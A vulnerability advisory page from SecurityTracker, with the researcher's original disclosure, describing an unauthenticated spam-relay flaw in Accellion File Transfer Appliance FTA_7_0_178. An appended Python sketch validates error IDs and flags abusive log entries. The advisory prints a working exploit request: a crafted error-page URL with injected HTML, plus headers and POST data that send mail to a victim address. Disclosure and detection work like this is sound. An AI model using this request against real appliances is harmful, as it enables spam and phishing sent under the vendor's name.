Accellion File Transfer Appliance Lets Remote Users Forward SPAM
SecurityTracker Alert ID: 1020870
SecurityTracker URL: http://securitytracker.com/id?1020870
CVE Reference: CVE-2008-7012
Updated: Aug 20 2009
Original Entry Date: Sep 15 2008
Impact: Host/resource access via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Version(s): FTA_7_0_178
Description: A vulnerability was reported in Accellion File Transfer Appliance. A remote user can send SPAM via the appliance.
A remote user can invoke the 'error reporting page' and create a support ticket with specially crafted text in the ID error reference field to cause the system to send arbitrary e-mail to arbitrary users.
The vendor was notified on August 20, 2008.
The original advisory is available at:
http://zebux.free.fr/pub/Advisory/Advisory_Accellion_SPAM_Engine_Vulnerability_200808.txt
Eric BEAULIEU reported this vulnerability.
Impact: A remote user can send SPAM to arbitrary users.
Solution: The vendor has issued a fixed version (FTA_7_0_189).
Vendor URL: www.accellion.com/
Cause: Access control error
Reported By: "Eric Beaulieu" <eric.beaulieu@gmail.com>
Message History:
None.
Source Message Contents
Date: Mon, 15 Sep 2008 13:52:21 +0200
From: "Eric Beaulieu" <eric.beaulieu@gmail.com>
Subject: New vulnerability in Accellion File Transfer Appliance
Hello,
I recently found a security issue on Accellion File Transfer Appliance.
This vulnerability could be used to send SPAM to internal and external addresses.
After I reported this issue to Accellion, they fixed this problem with the FTA_7_0_189 version, and Accellion informed their clients that they have to update their appliance.
For information about Accellion FTA (www.accellion.com):
Accellion File Transfer Appliance (FTA) is a secure file transfer solution. This appliance allows enterprises to securely send and receive large e-mail attachments without any modification of the email architecture.
My advisory is on my website :
http://zebux.free.fr/pub/Advisory/Advisory_Accellion_SPAM_Engine_Vulnerability_200808.txt
Title: Accellion File Transfer - SPAM Engine Vulnerabilities
Criticality: High (3/3)
Affected software: Accellion File Transfer FTA_7_0_178
Author: Eric BEAULIEU, eric.beaulieu [at] zebux.org, http://www.zebux.org
Discovery Date: 20-08-2008
Issue solved: 18-08-2008
Location URL:
http://www.zebux.org/pub/Advisory/Advisory_Accellion_SPAM_Engine_Vulnerability_200808.txt
Summary
-------
Accellion File Transfer Appliance is prone to a vulnerability that can be exploited, without any authentication, by malicious remote people to conduct a SPAM attack.
Description
-----------
A vulnerability has been discovered in the Accellion "error reporting page", which could be exploited to send mass mailings to internal or external email addresses. The error reporting page is used to inform the Accellion administrator and Accellion support that there is a problem on the appliance (for example to inform them that a URL doesn't exist). Users have an interface to describe the problem and set their email address to receive a message with an Accellion support ticket ID.
But if a malicious user adds a message to the ID error reference (in the URL address bar), he will receive the ticket ID and the message text. So malicious people could use this URL address to send external and internal mass mailings (because the Accellion appliance is always allowed to send external and internal mail on the SMTP infrastructure).
Example:
To exploit this vulnerability, you have to forge a malicious HTTP request (for example with the Firefox module Live HTTP Headers):
URL:
https://[Accellion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM<H1>SPAM_ATTACK</H1>
HTTP HEADER:
Host: [Accellion web server]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://[Accellion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM<H1>SPAM_ATTACK</H1>
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
POST DATA:
description=Could+you+please+close+this+tickets%0D%0A%0D%0ARegards&client_email=email_to_spam%40victim_domain.com&submit=Soumettre+le+rapport
The malicious message will be:
From : support@accellion.com [mailto:support@accellion.com]
À : email_to_spam@victim_domain.com
Objet : API Error Report: 1002K725PI-888-100Test_SPAM
<H1>SPAM_ATTACK</H1>
Hi email_to_spam,
Error ID 1002K725PI-888-100Test_SPAM
SPAM_ATTACK
Timestamp 2008-08-19 08:20:53 GMT
This email has been sent to you for your own reference.
We will attend to this error report as soon as possible.
Thank you for using Secure File Transfer.
________________________________________
Accellion Pte Ltd
http://www.accellion.com
Solution
--------
Upgrade to version FTA_7_0_189
Workaround
----------
There is no workaround.
References
----------
FrSIRT Advisory:
Bugtraq ID:
Websense Advisory URL:
Secunia Advisory ID:
CVE ID:
Security Tracker:
Timeline
--------
20-08-2008 - Vulnerability was discovered
21-08-2008 - Vulnerability reported to vendor
22-08-2008 - Vendor informed about the state of the fix process
28-08-2006 - Vendor published the new version and contacted Accellion customers
Revision history
----------------
18-08-2008 - 1.0 - Advisory written
If you have any questions, please feel free to contact me. Thanks in advance.
Eric BEAULIEU
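As an added illustration (not the author's or Accellion's code), the following Python sketches the defender's view of the flaw described above: the ticket-acknowledgement mail builder in its vulnerable form (the id parameter is echoed verbatim) beside a strict form that validates the reference first, plus a log check that flags hits on api_error_email.html whose id is not a well-formed reference. The ID pattern, the Common Log Format input and the sample lines are assumptions, not documented by the advisory.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed format of a legitimate error reference ID, modelled on the value
# "1002K725PI-888-100" shown in the advisory; the appliance's real format is
# not documented on the page, so this pattern is an assumption.
ERROR_ID_RE = re.compile(r"^[0-9A-Z]{10}-[0-9]{3}-[0-9]{3}$")

def is_valid_error_id(error_id):
    """Accept only well-formed references; anything else is free text."""
    return bool(ERROR_ID_RE.match(error_id))

def build_report_mail(error_id, client_email, strict):
    """Compose the ticket acknowledgement the appliance mails to client_email.
    strict=False mirrors the vulnerable behaviour: the id parameter is echoed
    verbatim into subject and body, so the page works as a mail relay.
    strict=True validates the id first, so free text never reaches the mail."""
    if strict and not is_valid_error_id(error_id):
        raise ValueError("rejected error reference: %r" % error_id)
    return ("Subject: API Error Report: %s\nTo: %s\n\nError ID %s\n"
            % (error_id, client_email, error_id))

def flag_suspicious_requests(access_log_lines):
    """Return (client_ip, decoded id) for Common Log Format hits on
    api_error_email.html whose id does not match ERROR_ID_RE."""
    hits = []
    for line in access_log_lines:
        parts = line.split()
        if len(parts) < 7 or "api_error_email.html" not in parts[6]:
            continue
        query = parse_qs(urlsplit(parts[6]).query, keep_blank_values=True)
        for error_id in query.get("id", []):  # parse_qs percent-decodes
            if not is_valid_error_id(error_id):
                hits.append((parts[0], error_id))
    return hits

# Constructed sample log lines (not from the page): legitimate, abusive, unrelated.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Aug/2008:08:20:10 +0000] "POST /courier/1000@/'
    'api_error_email.html?id=1002K725PI-888-100 HTTP/1.1" 200 512',
    '198.51.100.9 - - [19/Aug/2008:08:20:53 +0000] "POST /courier/1000@/'
    'api_error_email.html?id=1002K725PI-888-100Test_SPAM%3CH1%3ESPAM_ATTACK'
    '%3C/H1%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [19/Aug/2008:08:22:00 +0000] "GET /courier/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, bad_id in flag_suspicious_requests(SAMPLE_LOG):
        print("suspicious error-page request from %s: id=%r" % (ip, bad_id))
```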